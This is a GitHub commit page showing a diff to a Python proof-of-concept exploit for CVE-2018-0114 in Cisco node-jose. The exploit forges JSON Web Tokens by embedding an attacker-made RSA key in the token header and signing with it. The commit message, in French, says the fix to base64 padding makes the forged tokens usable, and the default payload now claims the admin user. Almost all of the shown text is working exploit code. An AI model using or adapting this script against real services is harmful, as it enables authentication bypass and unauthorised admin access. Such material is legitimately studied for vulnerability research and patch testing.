-
Notifications
You must be signed in to change notification settings - Fork 10
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
MOD(jwj-node_jose.py): Modification des encodages en base 64, plus aj…
…out de urlsafe Avant, on avait des artefacts "=" dans le token ce qui ne permettais pas de les utiliser, de plus j'ai ajouté un urlsafe encode pour la signature, car cela peut poser des problèmes pour lire le token
- Loading branch information
1 parent
952dbf0
commit 71b2379
Showing
1 changed file
with
12 additions
and
12 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
|
|
@@ -9,8 +9,8 @@ | |
|
|
||
| ''' | ||
| POC of CVE-2018-0114 Cisco node-jose <0.11.0 | ||
| Example: python3 44324.py "mypayload" 512 | ||
| Exploitdb: https://www.exploit-db.com/exploits/44324 | ||
| Example: python3 44324.py "mypayload" 512 | ||
| Exploitdb: https://www.exploit-db.com/exploits/44324 | ||
| Created by Andrea Cappa aka @zi0Black (GitHub,Twitter,Telegram) | ||
|
|
@@ -43,21 +43,21 @@ def generate_header_payload(payload,pubkey): | |
| print ("[+]Assembling-the-header-and-the-payload") | ||
| n=base64.urlsafe_b64encode(pack_bigint(pubkey.n)).decode('utf-8').rstrip('=') | ||
| e=base64.urlsafe_b64encode(pack_bigint(pubkey.e)).decode('utf-8').rstrip('=') | ||
| headerAndPayload = base64.b64encode(('{"alg":"RS256",' | ||
| headerAndPayload = str(base64.urlsafe_b64encode(('{"alg":"RS256",' | ||
| '"jwk":{"kty":"RSA",' | ||
| '"kid":"[email protected]",' | ||
| '"use":"sig",' | ||
| '"n":"'+n+'",' | ||
| '"e":"'+e+'"}}').encode()) | ||
| headerAndPayload = headerAndPayload+b"."+base64.b64encode(payload) | ||
| '"e":"'+e+'"}}').encode()))[2:-1].replace("=","").encode('utf-8') | ||
| headerAndPayload = headerAndPayload+b"."+str(base64.urlsafe_b64encode(payload))[2:-1].replace("=","").encode('utf-8') | ||
| headerAndPayload = headerAndPayload | ||
| print ("\t[+]Assembed") | ||
| return headerAndPayload | ||
|
|
||
| def generate_signature(firstpart,privkey): | ||
| #create signature | ||
| signature = rsa.sign(firstpart,privkey,'SHA-256') | ||
| signatureEnc = base64.b64encode(signature) | ||
| signatureEnc = str(base64.urlsafe_b64encode(signature))[2:-1].replace("=","").encode('utf-8') | ||
| print ("[+]Signature-created") | ||
| return signatureEnc | ||
|
|
||
|
|
@@ -71,17 +71,17 @@ def create_token(headerAndPayload,sign): | |
| payload = bytes(str(sys.argv[1]).encode('ascii')) | ||
| key_size = int(sys.argv[2]) | ||
| else: | ||
| payload = b'admin' | ||
| payload = b'{"user":"admin"}' | ||
| key_size = int(512) | ||
|
|
||
|
|
||
| banner=""" | ||
| _____ __ __ ______ ___ ___ __ ___ ___ __ __ _ _ | ||
| / ____| \ \ / / | ____| |__ \ / _ \ /_ | / _ \ / _ \ /_ | /_ | | || | | ||
| | | \ \ / / | |__ ______ ) | | | | | | | | (_) | ______ | | | | | | | | | || |_ | ||
| _____ __ __ ______ ___ ___ __ ___ ___ __ __ _ _ | ||
| / ____| \ \ / / | ____| |__ \ / _ \ /_ | / _ \ / _ \ /_ | /_ | | || | | ||
| | | \ \ / / | |__ ______ ) | | | | | | | | (_) | ______ | | | | | | | | | || |_ | ||
| | | \ \/ / | __| |______| / / | | | | | | > _ < |______| | | | | | | | | |__ _| | ||
| | |____ \ / | |____ / /_ | |_| | | | | (_) | | |_| | | | | | | | | ||
| \_____| \/ |______| |____| \___/ |_| \___/ \___/ |_| |_| |_| by @zi0Black | ||
| | |____ \ / | |____ / /_ | |_| | | | | (_) | | |_| | | | | | | | | ||
| \_____| \/ |______| |____| \___/ |_| \___/ \___/ |_| |_| |_| by @zi0Black | ||
| """ | ||
|
|
||
| if __name__ == '__main__': | ||
|
|
||